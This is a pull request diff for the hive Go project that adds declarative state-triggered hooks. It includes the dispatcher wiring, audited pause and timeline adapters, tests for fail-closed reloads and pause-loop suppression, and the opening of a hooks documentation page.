### PR TITLE
✨ hooks: state-triggered hooks as a first-class extension point (port #4056 from v5)

### DIFF
--- a/src/cmd/hive/hookwire.go
+++ b/src/cmd/hive/hookwire.go
@@ -1,0 +1,325 @@
+package main
+
+import (
+	"context"
+	"errors"
+	"log/slog"
+	"sync"
+
+	"github.com/kubestellar/hive/pkg/agent"
+	"github.com/kubestellar/hive/pkg/config"
+	"github.com/kubestellar/hive/pkg/governor"
+	"github.com/kubestellar/hive/pkg/hooks"
+	"github.com/kubestellar/hive/pkg/hub"
+	"github.com/kubestellar/hive/pkg/notify"
+	"github.com/kubestellar/hive/pkg/timeline"
+)
+
+// Sentinel errors for an adapter whose backing object was never installed.
+// They surface in the audit log as a hook failure rather than a silent no-op:
+// an action that quietly does nothing is the failure mode this whole feature
+// is meant to avoid.
+var (
+	errNoAgentManager = errors.New("hooks: agent manager not wired; pause unavailable")
+	errNoTimeline     = errors.New("hooks: timeline store not wired; annotate unavailable")
+)
+
+// This file wires pkg/hooks (RFC #4001) into the running process. It owns the
+// adapters from hive's concrete objects onto the narrow sink interfaces the
+// hooks package declares, plus the recompile-on-config-change cache — the same
+// structure celwire.go uses for CEL triggers.
+//
+// Keeping the adapters HERE rather than in pkg/hooks is what lets that package
+// declare its mutation surface as four interfaces without importing the
+// dashboard, agent manager, or notifier (which would cycle).
+
+// hookDispatcherCache memoizes the compiled hook registry so it is rebuilt only
+// when the operator's `hooks:` list actually changes, not on every config
+// reload tick. Compilation is fail-closed: a malformed hook list leaves the
+// PREVIOUS registry in place, so a bad edit never disarms working hooks and
+// never crashes the process.
+type hookDispatcherCache struct {
+	mu         sync.Mutex
+	sig        string
+	dispatcher *hooks.Dispatcher
+	built      bool
+}
+
+// globalHookDispatcher is the process-wide hook dispatcher. Emitting sites
+// reach it through hookDispatcher(); a nil return means no hooks are
+// configured and firing is a no-op.
+var globalHookDispatcher hookDispatcherCache
+
+// hookDispatcher returns the process-wide dispatcher, or nil when no hooks are
+// configured. Nil-safe at the call site: hooks.Dispatcher.Fire tolerates a nil
+// receiver, so emitters need no guard.
+func hookDispatcher() *hooks.Dispatcher {
+	globalHookDispatcher.mu.Lock()
+	defer globalHookDispatcher.mu.Unlock()
+	return globalHookDispatcher.dispatcher
+}
+
+// hookSinks bundles the concrete objects the hook actions act through. Every
+// one is optional; a missing sink makes its action a reported failure rather
+// than a silent no-op.
+type hookSinks struct {
+	Notifier  *notify.Notifier
+	AgentMgr  *agent.Manager
+	Timeline  *timeline.Store
+	Audit     hooks.AuditSink
+	Approvals hooks.ApprovalQueue // #4000; nil until that RFC lands
+}
+
+// buildHookDispatcher compiles the operator's `hooks:` list and installs the
+// dispatcher, rebuilding only when the list changed.
+//
+// Call it at startup and after each config reload. On a compile error it logs
+// and KEEPS the previous dispatcher, matching celEngineFor's fail-closed
+// posture: an operator's typo must not silently disarm hooks that were working.
+func buildHookDispatcher(cfg *config.Config, sinks hookSinks, logger *slog.Logger) {
+	if cfg == nil {
+		return
+	}
+	sig := hooks.SignatureFromConfig(cfg)
+
+	globalHookDispatcher.mu.Lock()
+	defer globalHookDispatcher.mu.Unlock()
+
+	if globalHookDispatcher.built && globalHookDispatcher.sig == sig {
+		return
+	}
+	globalHookDispatcher.sig = sig
+	globalHookDispatcher.built = true
+
+	if len(cfg.Hooks) == 0 {
+		// Disarm by swapping in an EMPTY registry rather than dropping the
+		// dispatcher. Nil'ing it here would discard the rate-limit windows
+		// with it, so "remove all hooks, re-add them" — two ordinary config
+		// edits — would rebuild a fresh limiter and clear the storm ceiling,
+		// defeating the very bypass the in-place swap below exists to prevent.
+		// An empty registry is already a total no-op (one map lookup per
+		// transition), so keeping the dispatcher costs nothing.
+		if globalHookDispatcher.dispatcher != nil {
+			globalHookDispatcher.dispatcher.SetRegistry(nil)
+		}
+		return
+	}
+
+	reg, err := hooks.CompileFromConfig(cfg)
+	if err != nil {
+		// Fail closed, and loudly: the operator asked for behavior that hive
+		// is refusing to arm, which they must be able to see.
+		logger.Error("hooks: rejecting invalid hook config; keeping the previous hook set",
+			"error", err)
+		return
+	}
+
+	// Hot reload of an existing dispatcher swaps the registry in place, which
+	// PRESERVES the rate-limit windows. Rebuilding the dispatcher instead
+	// would reset them, letting a reload loop bypass the storm ceiling.
+	if globalHookDispatcher.dispatcher != nil {
+		globalHookDispatcher.dispatcher.SetRegistry(reg)
+		logger.Info("hooks: reloaded hook set", "hooks", reg.Len())
+		return
+	}
+
+	opts := []hooks.Option{}
+	if sinks.Notifier != nil {
+		opts = append(opts, hooks.WithNotifier(&notifierAdapter{n: sinks.Notifier}))
+	}
+	if sinks.AgentMgr != nil {
+		opts = append(opts, hooks.WithPauser(&pauserAdapter{mgr: sinks.AgentMgr}))
+	}
+	if sinks.Timeline != nil {
+		opts = append(opts, hooks.WithAnnotator(&annotatorAdapter{store: sinks.Timeline}))
+	}
+	if sinks.Audit != nil {
+		opts = append(opts, hooks.WithAuditSink(sinks.Audit))
+	}
+	if sinks.Approvals != nil {
+		opts = append(opts, hooks.WithApprovalQueue(sinks.Approvals))
+	}
+
+	globalHookDispatcher.dispatcher = hooks.NewDispatcher(reg, logger, opts...)
+	logger.Info("hooks: compiled hook set", "hooks", reg.Len())
+}
+
+// ---------------------------------------------------------------------------
+// Emitters
+// ---------------------------------------------------------------------------
+
+// installGovernorModeChangeEmitter wires the governor_mode_change transition to
+// its hooks. The governor invokes the observer AFTER committing the change and
+// AFTER releasing its mutex, which is what makes this a post-commit emission
+// rather than an inline one.
+//
+// This is the template for cataloging the remaining implicit transitions: find
+// the durable commit, emit after it, and let the dispatcher do the rest.
+func installGovernorModeChangeEmitter(gov *governor.Governor) {
+	if gov == nil {
+		return
+	}
+	gov.SetModeChangeObserver(func(change governor.ModeChange) {
+		// hookDispatcher() may be nil (no hooks configured); Fire is nil-safe.
+		hookDispatcher().Fire(context.Background(), hooks.Payload{
+			Transition: hooks.TransitionGovernorModeChange,
+			From:       string(change.From),
+			To:         string(change.To),
+			Reason:     change.Reason,
+			Actor:      "system",
+			At:         change.Timestamp.UnixMilli(),
+		})
+	})
+}
+
+func installAgentPauseEmitter(mgr *agent.Manager) {
+	if mgr == nil {
+		return
+	}
+	mgr.SetPauseTransitionObserver(func(event agent.PauseTransitionEvent) {
+		transition := hooks.TransitionAgentResumed
+		if event.Paused {
+			transition = hooks.TransitionAgentPaused
+		}
+		hookDispatcher().Fire(context.Background(), hooks.Payload{
+			Transition: transition,
+			Agent:      event.Agent,
+			Actor:      event.By,
+			Trigger:    event.Trigger,
+			Reason:     event.Reason,
+			At:         event.At.UnixMilli(),
+			Causation: hooks.Causation{
+				Depth:            event.Causation.Depth,
+				HookName:         event.Causation.HookName,
+				OriginTransition: hooks.Transition(event.Causation.OriginTransition),
+			},
+		})
+	})
+}
+
+func installUpgradePauseEmitter(hubSrv *hub.HubServer) {
+	if hubSrv == nil {
+		return
+	}
+	hubSrv.SetUpgradePauseObserver(func(event hub.UpgradePauseEvent) {
+		to := "off"
+		if event.Paused {
+			to = "on"
+		}
+		hookDispatcher().Fire(context.Background(), hooks.Payload{
+			Transition: hooks.TransitionUpgradePause,
+			To:         to,
+			Actor:      event.By,
+			Reason:     event.Target,
+			Attrs:      map[string]string{"target": event.Target},
+		})
+	})
+}
+
+// ---------------------------------------------------------------------------
+// Adapters
+// ---------------------------------------------------------------------------
+
+// notifierAdapter bridges hooks.Notifier (which speaks plain strings, so
+// pkg/hooks need not import pkg/notify) onto the real fanout.
+type notifierAdapter struct{ n *notify.Notifier }
+
+func (a *notifierAdapter) Send(title, message, priority string) {
+	if a == nil || a.n == nil {
+		return
+	}
+	a.n.Send(title, message, notify.Priority(priority))
+}
+
+// hookPauseTrigger is the PausedTrigger stamped when a hook pauses an agent.
+// It makes "why is this agent paused?" answerable from the pause record alone,
+// distinguishing a hook-driven pause from an operator's, the login-detector's,
+// or the fleet-breaker's — the provenance discipline #4041/#4055 established.
+const hookPauseTrigger = "hook"
+
+// hookPauseTriggerFor derives the paused_trigger provenance value for a
+// hook-driven pause, naming the responsible hook when one is known so the
+// durable pause record answers "why is this agent paused?" on its own.
+func hookPauseTriggerFor(cause hooks.Causation) string {
+	if cause.HookName == "" {
+		return hookPauseTrigger
+	}
+	return hookPauseTrigger + ":" + cause.HookName
+}
+
+// pauserAdapter routes the pause action through the AUDITED agent-manager
+// pause — the same entry point the dashboard's pause button uses. It never
+// writes the paused flag directly.
+type pauserAdapter struct{ mgr *agent.Manager }
+
+func (a *pauserAdapter) PauseAgent(ctx context.Context, agentName, reason string, cause hooks.Causation) error {
+	if a == nil || a.mgr == nil {
+		return errNoAgentManager
+	}
+	// The causation is folded into the trigger provenance so the durable pause
+	// record names the responsible hook ("hook:<name>").
+	//
+	// LOOP-SAFETY REQUIREMENT: installAgentPauseEmitter must carry this
+	// structured cause through on the payload it fires. With agent_paused wired,
+	// the depth-1 guard is the ONLY thing stopping a pause→agent_paused→pause
+	// cycle, and it works solely off Payload.Causation.
+	//
+	// Do NOT try to recover the depth by parsing the trigger string below.
+	// It is human-readable provenance, not a machine-readable causation
+	// chain; a pause routed through the manager loses the structured cause
+	// unless the emitter is given it directly.
+	//
+	// PauseBy rather than Pause (#4055): a hook-driven pause must not appear
+	// anonymous, because "paused, actor unknown" is exactly the state #4041
+	// found indistinguishable from a malfunction days later. The acting
+	// identity is the HOOK, not a person — PauseBy's contract is "never
+	// fabricate" a human actor, so hookPauseActor is an explicitly
+	// non-human identity that cannot be mistaken for a dashboard user.
+	return a.mgr.PauseByCause(agentName, hookPauseTriggerFor(cause), reason, hookPauseActor(cause), agent.PauseCausation{
+		Depth:            cause.Depth,
+		HookName:         cause.HookName,
+		OriginTransition: string(cause.OriginTransition),
+	})
+}
+
+// hookPauseActor is the PausedBy identity recorded for a hook-driven pause.
+//
+// It is deliberately NOT a username. PauseBy documents `by` as the acting user
+// and warns against fabricating one, so this returns a clearly-machine
+// identity ("hook:<name>") that a reader — or the fleet view — cannot confuse
+// with a person, while still answering "what paused this agent?" without a
+// join against the audit log.
+func hookPauseActor(cause hooks.Causation) string {
+	if cause.HookName == "" {
+		return hookPauseTrigger
+	}
+	return hookPauseTrigger + ":" + cause.HookName
+}
+
+// annotatorAdapter records hook annotations on the EXISTING lifecycle timeline
+// rather than a parallel event bus, per the RFC's "build on timeline.Store".
+type annotatorAdapter struct{ store *timeline.Store }
+
+func (a *annotatorAdapter) Annotate(ctx context.Context, agentName, issueRef, note string, attrs map[string]string) error {
+	if a == nil || a.store == nil {
+		return errNoTimeline
+	}
+	// Copy the attrs and carry the note as one, so the timeline entry is
+	// self-describing without needing a new Event field.
+	merged := make(map[string]string, len(attrs)+1)
+	for k, v := range attrs {
+		merged[k] = v
+	}
+	merged["note"] = note
+
+	a.store.Record(timeline.Event{
+		IssueRef: issueRef,
+		// A hook annotation is a blocked/attention-worthy marker rather than a
+		// lifecycle stage of its own; KindBlocked is the closest existing kind
+		// and keeps the timeline's closed Kind set closed.
+		Kind:  timeline.KindBlocked,
+		Agent: agentName,
+		Attrs: merged,
+	})
+	return nil
+}

--- a/src/cmd/hive/hookwire_test.go
+++ b/src/cmd/hive/hookwire_test.go
@@ -1,0 +1,331 @@
+package main
+
+import (
+	"context"
+	"io"
+	"log/slog"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/kubestellar/hive/pkg/agent"
+	"github.com/kubestellar/hive/pkg/config"
+	"github.com/kubestellar/hive/pkg/hooks"
+	"github.com/kubestellar/hive/pkg/timeline"
+)
+
+func hookTestLogger() *slog.Logger {
+	return slog.New(slog.NewTextHandler(io.Discard, nil))
+}
+
+// resetHookDispatcher clears the process-wide cache so tests do not leak state
+// into each other.
+func resetHookDispatcher(t *testing.T) {
+	t.Helper()
+	globalHookDispatcher.mu.Lock()
+	defer globalHookDispatcher.mu.Unlock()
+	globalHookDispatcher.sig = ""
+	globalHookDispatcher.dispatcher = nil
+	globalHookDispatcher.built = false
+}
+
+func TestBuildHookDispatcherArmsConfiguredHooks(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name: "h", On: "review_rejected", Action: "notify",
+	}}}
+	buildHookDispatcher(cfg, hookSinks{}, hookTestLogger())
+
+	d := hookDispatcher()
+	if d == nil {
+		t.Fatal("a configured hook should produce a dispatcher")
+	}
+	if d.Len() != 1 {
+		t.Errorf("expected 1 hook armed, got %d", d.Len())
+	}
+}
+
+func TestBuildHookDispatcherNoHooksIsNil(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	buildHookDispatcher(&config.Config{}, hookSinks{}, hookTestLogger())
+	if hookDispatcher() != nil {
+		t.Error("no configured hooks should leave the dispatcher nil (total no-op)")
+	}
+	// A nil dispatcher must still be safe to fire through.
+	hookDispatcher().Fire(context.Background(), hooks.Payload{
+		Transition: hooks.TransitionGovernorModeChange,
+	})
+}
+
+// TestBuildHookDispatcherKeepsPreviousSetOnInvalidConfig is the fail-closed
+// reload guarantee: a bad edit must not disarm hooks that were working.
+func TestBuildHookDispatcherKeepsPreviousSetOnInvalidConfig(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	good := &config.Config{Hooks: []config.HookRule{{
+		Name: "good", On: "review_rejected", Action: "notify",
+	}}}
+	buildHookDispatcher(good, hookSinks{}, hookTestLogger())
+	if hookDispatcher().Len() != 1 {
+		t.Fatal("setup: expected the good hook armed")
+	}
+
+	// Operator introduces a typo.
+	bad := &config.Config{Hooks: []config.HookRule{{
+		Name: "bad", On: "review_rejcted", Action: "notify",
+	}}}
+	buildHookDispatcher(bad, hookSinks{}, hookTestLogger())
+
+	d := hookDispatcher()
+	if d == nil || d.Len() != 1 {
+		t.Error("an invalid reload must keep the previous hook set armed, not disarm it")
+	}
+}
+
+// TestBuildHookDispatcherReloadPreservesRateLimitWindow: swapping the registry
+// in place (rather than rebuilding) is what stops a reload loop from clearing
+// the anti-storm ceiling.
+func TestBuildHookDispatcherReloadPreservesRateLimitWindow(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name: "h", On: "review_rejected", Action: "notify", RateLimitPerMinute: 1,
+	}}}
+	buildHookDispatcher(cfg, hookSinks{}, hookTestLogger())
+	first := hookDispatcher()
+
+	// A changed hook list forces a rebuild path.
+	cfg2 := &config.Config{Hooks: []config.HookRule{{
+		Name: "h", On: "review_rejected", Action: "notify", RateLimitPerMinute: 2,
+	}}}
+	buildHookDispatcher(cfg2, hookSinks{}, hookTestLogger())
+	second := hookDispatcher()
+
+	if first != second {
+		t.Error("reload must swap the registry inside the SAME dispatcher, " +
+			"or rate-limit windows reset and the storm ceiling can be bypassed")
+	}
+}
+
+// TestDisarmThenRearmPreservesRateLimitWindow is the bypass regression.
+//
+// Reload preserves the limiter by swapping the registry in place — but if
+// removing every hook DROPPED the dispatcher, re-adding them would build a
+// fresh one with a fresh limiter. Two ordinary config edits (remove all hooks,
+// re-add them) would then clear the storm ceiling, defeating the exact
+// protection the in-place swap exists to provide.
+func TestDisarmThenRearmPreservesRateLimitWindow(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	armed := &config.Config{Hooks: []config.HookRule{{
+		Name: "h", On: "review_rejected", Action: "notify",
+	}}}
+	buildHookDispatcher(armed, hookSinks{}, hookTestLogger())
+	first := hookDispatcher()
+	if first == nil {
+		t.Fatal("setup: expected an armed dispatcher")
+	}
+
+	// Operator removes every hook…
+	buildHookDispatcher(&config.Config{}, hookSinks{}, hookTestLogger())
+	disarmed := hookDispatcher()
+	if disarmed == nil {
+		t.Fatal("disarming must keep the dispatcher (with an empty registry), " +
+			"or the rate-limit windows are discarded with it")
+	}
+	if disarmed.Len() != 0 {
+		t.Errorf("a disarmed dispatcher should hold no hooks, got %d", disarmed.Len())
+	}
+
+	// …then puts them back.
+	buildHookDispatcher(armed, hookSinks{}, hookTestLogger())
+	rearmed := hookDispatcher()
+
+	if rearmed != first {
+		t.Error("disarm→re-arm must reuse the SAME dispatcher; rebuilding it resets " +
+			"the rate-limit windows and gives operators a two-edit ceiling bypass")
+	}
+	if rearmed.Len() != 1 {
+		t.Errorf("expected the hook re-armed, got %d", rearmed.Len())
+	}
+}
+
+func TestBuildHookDispatcherSkipsRecompileWhenUnchanged(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name: "h", On: "review_rejected", Action: "notify",
+	}}}
+	buildHookDispatcher(cfg, hookSinks{}, hookTestLogger())
+	before := hookDispatcher()
+
+	// Same list again: must be a signature hit, not a rebuild.
+	buildHookDispatcher(cfg, hookSinks{}, hookTestLogger())
+	if hookDispatcher() != before {
+		t.Error("an unchanged hook list must not rebuild the dispatcher")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Adapters
+// ---------------------------------------------------------------------------
+
+func TestAnnotatorAdapterRecordsOnTheExistingTimeline(t *testing.T) {
+	store := timeline.NewStore()
+	a := &annotatorAdapter{store: store}
+
+	err := a.Annotate(context.Background(), "reviewer", "o/r#1", "quality flag",
+		map[string]string{"hook": "h", "model": "claude-opus-4"})
+	if err != nil {
+		t.Fatalf("annotate: %v", err)
+	}
+
+	events := store.Recent(10)
+	if len(events) != 1 {
+		t.Fatalf("expected 1 timeline event, got %d", len(events))
+	}
+	e := events[0]
+	if e.Agent != "reviewer" || e.IssueRef != "o/r#1" {
+		t.Errorf("event fields lost: %+v", e)
+	}
+	if e.Attrs["note"] != "quality flag" {
+		t.Errorf("note should be carried in attrs, got %q", e.Attrs["note"])
+	}
+	if e.Attrs["model"] != "claude-opus-4" {
+		t.Errorf("model context lost: %+v", e.Attrs)
+	}
+}
+
+func TestAdaptersReportErrorsWhenBackingObjectMissing(t *testing.T) {
+	if err := (&annotatorAdapter{}).Annotate(context.Background(), "a", "", "n", nil); err == nil {
+		t.Error("an unwired timeline must report an error, not silently succeed")
+	}
+	if err := (&pauserAdapter{}).PauseAgent(context.Background(), "a", "r", hooks.Causation{}); err == nil {
+		t.Error("an unwired agent manager must report an error, not silently succeed")
+	}
+	// The notifier adapter is fire-and-forget; it must simply not panic.
+	(&notifierAdapter{}).Send("t", "m", "high")
+}
+
+// TestHookPauseTriggerNamesTheResponsibleHook: a hook-driven pause must be
+// distinguishable from an operator's or the governor's in the durable
+// paused_trigger record, and must name WHICH hook did it.
+func TestHookPauseTriggerNamesTheResponsibleHook(t *testing.T) {
+	got := hookPauseTriggerFor(hooks.Causation{Depth: 1, HookName: "pause-on-red"})
+	if !strings.HasPrefix(got, hookPauseTrigger) {
+		t.Errorf("trigger should be identifiable as hook-driven, got %q", got)
+	}
+	if !strings.Contains(got, "pause-on-red") {
+		t.Errorf("trigger should name the responsible hook, got %q", got)
+	}
+
+	// With no hook name it still identifies as hook-driven rather than
+	// masquerading as an operator action.
+	if got := hookPauseTriggerFor(hooks.Causation{}); got != hookPauseTrigger {
+		t.Errorf("expected %q, got %q", hookPauseTrigger, got)
+	}
+}
+
+// TestHookPauseActorIsNonHumanAndAttributed adopts #4055's PausedBy: a
+// hook-driven pause must not land anonymous (the "paused, actor unknown" state
+// #4041 found indistinguishable from a malfunction), but it also must not
+// fabricate a human actor, which is what PauseBy's contract forbids.
+func TestHookPauseActorIsNonHumanAndAttributed(t *testing.T) {
+	got := hookPauseActor(hooks.Causation{Depth: 1, HookName: "pause-on-red"})
+
+	if got == "" {
+		t.Error("a hook-driven pause must record an actor, not land anonymous")
+	}
+	if !strings.HasPrefix(got, hookPauseTrigger+":") {
+		t.Errorf("the actor must be a machine identity a reader cannot mistake "+
+			"for a dashboard user, got %q", got)
+	}
+	if !strings.Contains(got, "pause-on-red") {
+		t.Errorf("the actor should name the responsible hook, got %q", got)
+	}
+
+	// Unnamed hook: still non-anonymous, still clearly not a person.
+	if got := hookPauseActor(hooks.Causation{}); got != hookPauseTrigger {
+		t.Errorf("expected %q, got %q", hookPauseTrigger, got)
+	}
+}
+
+type hookWireAudit struct {
+	mu      sync.Mutex
+	actions []string
+	ch      chan string
+}
+
+func (a *hookWireAudit) Record(actor, action, agentName string, fields map[string]any) {
+	a.mu.Lock()
+	a.actions = append(a.actions, action)
+	a.mu.Unlock()
+	select {
+	case a.ch <- action:
+	default:
+	}
+}
+
+func (a *hookWireAudit) count(action string) int {
+	a.mu.Lock()
+	defer a.mu.Unlock()
+	var n int
+	for _, got := range a.actions {
+		if got == action {
+			n++
+		}
+	}
+	return n
+}
+
+func TestAgentPausedEmitterCarriesHookCausationAndStopsPauseLoop(t *testing.T) {
+	resetHookDispatcher(t)
+	t.Cleanup(func() { resetHookDispatcher(t) })
+
+	mgr := agent.NewManager(map[string]config.AgentConfig{
+		"scanner": {Backend: "claude"},
+	}, hookTestLogger(), agent.ProjectContext{})
+	audit := &hookWireAudit{ch: make(chan string, 8)}
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name: "pause-again", On: "agent_paused", Action: "pause",
+		Params: map[string]string{"agent": "scanner"},
+	}}}
+	buildHookDispatcher(cfg, hookSinks{AgentMgr: mgr, Audit: audit}, hookTestLogger())
+	installAgentPauseEmitter(mgr)
+
+	hookDispatcher().Fire(context.Background(), hooks.Payload{
+		Transition: hooks.TransitionAgentPaused,
+		Agent:      "scanner",
+		Trigger:    "world",
+		Reason:     "positive control",
+	})
+	deadline := time.After(time.Second)
+	for audit.count(hooks.AuditHookSuppressed) == 0 {
+		select {
+		case <-audit.ch:
+		case <-deadline:
+			t.Fatalf("expected hook-caused pause transition to be depth-suppressed; audit=%v", audit.actions)
+		}
+	}
+	hookDispatcher().Wait()
+
+	if got := audit.count(hooks.AuditHookFired); got != 1 {
+		t.Fatalf("pause hook should fire exactly once before depth suppression, got %d actions=%v", got, audit.actions)
+	}
+	status, err := mgr.GetStatus("scanner")
+	if err != nil {
+		t.Fatalf("GetStatus: %v", err)
+	}
+	if status.PausedBy != "hook:pause-again" || status.PausedTrigger != "hook:pause-again" {
+		t.Fatalf("hook pause provenance lost: by=%q trigger=%q", status.PausedBy, status.PausedTrigger)
+	}
+}

--- a/src/cmd/hive/main.go
+++ b/src/cmd/hive/main.go
@@ -59,6 +59,7 @@ import (
 	"github.com/kubestellar/hive/pkg/escalation"
 	"github.com/kubestellar/hive/pkg/github"
 	"github.com/kubestellar/hive/pkg/governor"
+	"github.com/kubestellar/hive/pkg/hooks"
 	"github.com/kubestellar/hive/pkg/hub"
 	"github.com/kubestellar/hive/pkg/intent"
 	"github.com/kubestellar/hive/pkg/ioscan"
@@ -1065,7 +1066,7 @@ func main() {
 	}
 
 	if os.Getenv("HIVE_MODE") == "hub" {
-		runHub(logger)
+		runHub(logger, *configPath)
 		return
 	}
 
@@ -2518,6 +2519,9 @@ func main() {
 		IssueClaimed: func(repo string, number int) (github.IssueClaim, bool) {
 			return getClaimLedger(logger).Lookup(repo, number)
 		},
+		HookFire: func(ctx context.Context, p hooks.Payload) {
+			hookDispatcher().Fire(ctx, p)
+		},
 		PersistFunc: func() {
 			persistState(agentMgr, gov, cfg, tokenCollector, statePath, logger, dashSrv, wd)
 		},
@@ -2957,6 +2961,17 @@ func main() {
 		gov.SetRepoCount(cfg.Project.RepoCount())
 		agentMgr.SetSandboxConfig(cfg.AgentSandbox)
 
+		// Hot-reload the state-triggered hooks (RFC #4001). Recompiles only
+		// when the `hooks:` list actually changed, and swaps the registry in
+		// place so per-hook rate-limit windows SURVIVE the reload — otherwise
+		// a reload loop would be a way to clear the anti-storm ceiling.
+		buildHookDispatcher(cfg, hookSinks{
+			Notifier: notifier,
+			AgentMgr: agentMgr,
+			Timeline: dashSrv.LifecycleTimeline(),
+			Audit:    dashSrv.AgentAuditSink(),
+		}, logger)
+
 		// Re-apply live agent definitions (definition_source) on reload so an
 		// operator's edit to a linked repo propagates. Merges only operator-safe
 		// fields; a fetch failure keeps each agent's baked definition. Runs before
@@ -3074,6 +3089,29 @@ func main() {
 	// did not support failed at every launch for a day, visible only as a WARN
 	// line inside the pod.
 	agentMgr.SetAuditSink(dashSrv.AgentAuditSink())
+
+	// Compile the operator's state-triggered hooks (RFC #4001). Every sink the
+	// vetted actions act through exists by this point: the notifier, the agent
+	// manager's AUDITED pause, the lifecycle timeline, and the same audit store
+	// the dashboard writes. The approvals sink stays nil until #4000's queue
+	// lands — an enqueue-approval hook then reports a wiring failure per firing
+	// rather than silently dropping the request.
+	//
+	// Fail-closed: an invalid hooks list logs and leaves the previous set
+	// armed; it never crashes the process or silently disarms working hooks.
+	buildHookDispatcher(cfg, hookSinks{
+		Notifier: notifier,
+		AgentMgr: agentMgr,
+		Timeline: dashSrv.LifecycleTimeline(),
+		Audit:    dashSrv.AgentAuditSink(),
+	}, logger)
+
+	// Emit the governor_mode_change transition post-commit. Installed once:
+	// the observer reads the dispatcher through hookDispatcher() on each
+	// firing, so a later config reload that arms or disarms hooks is picked up
+	// without re-registering.
+	installGovernorModeChangeEmitter(gov)
+	installAgentPauseEmitter(agentMgr)
 
 	// Register custom GHE hostnames with the proxy allowlist so mode
 	// enforcement applies to GitHub Enterprise API and web requests.
@@ -7003,7 +7041,23 @@ func recordRedStaleness(cfg *config.Config, actionable *github.ActionableResult)
 	if cfg.Escalation.Disabled || actionable == nil {
 		return
 	}
-	getEscalationStore().ObserveRed(hivePRObservations(cfg, actionable))
+	obs := hivePRObservations(cfg, actionable)
+	getEscalationStore().ObserveRed(obs)
+	for _, ob := range obs {
+		if !ob.Red {
+			continue
+		}
+		hookDispatcher().Fire(context.Background(), hooks.Payload{
+			Transition: hooks.TransitionEscalationRed,
+			Repo:       ob.Repo,
+			Reason:     "required CI check red",
+			Attrs: map[string]string{
+				hooks.AttrPR: strconv.Itoa(ob.Number),
+				"head_sha":   ob.HeadSHA,
+				"excerpt":    ob.Excerpt,
+			},
+		})
+	}
 }
 
 // mergeReEngageHook builds the Fix #2 re-engagement callback for the merge
@@ -7291,6 +7345,15 @@ func runAutoMergeSweepIfDue(ctx context.Context, ghClient *github.Client, dashSr
 	if len(result.Merged) > 0 || result.Seen > 0 {
 		logger.Info("automerge sweep complete", "seen", result.Seen, "merged", len(result.Merged), "skipped", result.Skipped)
 	}
+	hookDispatcher().Fire(context.Background(), hooks.Payload{
+		Transition: hooks.TransitionSweepCompleted,
+		Reason:     "queued automerge sweep complete",
+		Attrs: map[string]string{
+			"seen":    strconv.Itoa(result.Seen),
+			"merged":  strconv.Itoa(len(result.Merged)),
+			"skipped": strconv.Itoa(result.Skipped),
+		},
+	})
 }
 
 // mergeEligiblePath is a var (not a const) only so tests can point
@@ -8387,7 +8450,7 @@ func parseColorInt(color string) int {
 	return result
 }
 
-func runHub(logger *slog.Logger) {
+func runHub(logger *slog.Logger, configPath string) {
 	port := 3001
 	if p := os.Getenv("HIVE_HUB_PORT"); p != "" {
 		if parsed, err := strconv.Atoi(p); err == nil {
@@ -8397,6 +8460,14 @@ func runHub(logger *slog.Logger) {
 	logger.Info("starting in HUB mode", "port", port)
 
 	hubSrv := hub.NewHubServer(port, logger, gitShort, gitBranch)
+	if cfg, err := config.LoadWithDashboardOverlay(configPath); err == nil {
+		notifier := notify.New(cfg.Notifications, logger)
+		notifier.SetHiveID(cfg.HiveID)
+		buildHookDispatcher(cfg, hookSinks{Notifier: notifier}, logger)
+	} else if !errors.Is(err, os.ErrNotExist) {
+		logger.Warn("hub hooks disabled: failed to load config", "path", configPath, "error", err)
+	}
+	installUpgradePauseEmitter(hubSrv)
 
 	// /api/reach (#3994) needs merged-PR metadata (merge SHA, changed
 	// files). The hub mode has no ambient GitHub client, so reuse the

--- a/src/docs/README.md
+++ b/src/docs/README.md
@@ -24,6 +24,7 @@ Start with [Architecture](architecture.md) for the system overview, then use the
 - [Security notes](https://github.com/kubestellar/hive/blob/v4/src/docs/security.md) — log scrubbing and secret redaction guarantees/limits.
 - [Token collection and usage tracking](https://github.com/kubestellar/hive/blob/v4/src/docs/token-tracking.md) — session JSONL, `/api/cost`, and hub usage rollups.
 - [Notifications](https://github.com/kubestellar/hive/blob/v4/src/docs/notifications.md) — ntfy, Slack, and Discord alert channels, plus the two-way [Discord bot](https://github.com/kubestellar/hive/blob/v4/discord/README.md).
+- [State-triggered hooks](hooks.md) — declarative `transition → action` rules, the transition catalog, the vetted action set, and the security model (RFC #4001).
 - [Public snapshots](https://github.com/kubestellar/hive/blob/v4/src/docs/snapshots.md) — read-only `/snapshot`, custom CSS, and frame-ancestor sharing.
 - [hivectl](hivectl.md) — command-line client for the dashboard API.
 - [`bd` beads CLI](https://github.com/kubestellar/hive/blob/v4/src/docs/beads-cli.md) — work-ledger and knowledge command reference for operators and contributors.

--- a/src/docs/hooks.md
+++ b/src/docs/hooks.md
@@ -1,0 +1,281 @@
+# State-triggered hooks
+
+Hooks let an operator attach behavior to hive's state transitions **declaratively**, in config, instead of patching core. When a named transition durably commits, hive performs a vetted action.
+
+This implements [RFC #4001](https://github.com/kubestellar/hive/issues/4001).
+
+```yaml
+# /data/hive.yaml (PVC-backed running config)
+hooks:
+  - name: review-rejected-notify
+    on: review_rejected
+    action: notify
+    params:
+      priority: high
+```
+
+That one rule is the shipped default: when a human rejects a review's output, hive sends a notification naming the model that produced it and linking straight to that model's pin control.
+
+## Why this exists
+
+Hive already reacts to state transitions everywhere — the governor's mode changes, agent pause/resume, sweep results, escalation's red-CI reactions, ACMM level changes, the upgrade kill switch. Every one of those reactions is hand-rolled at its call site.
+
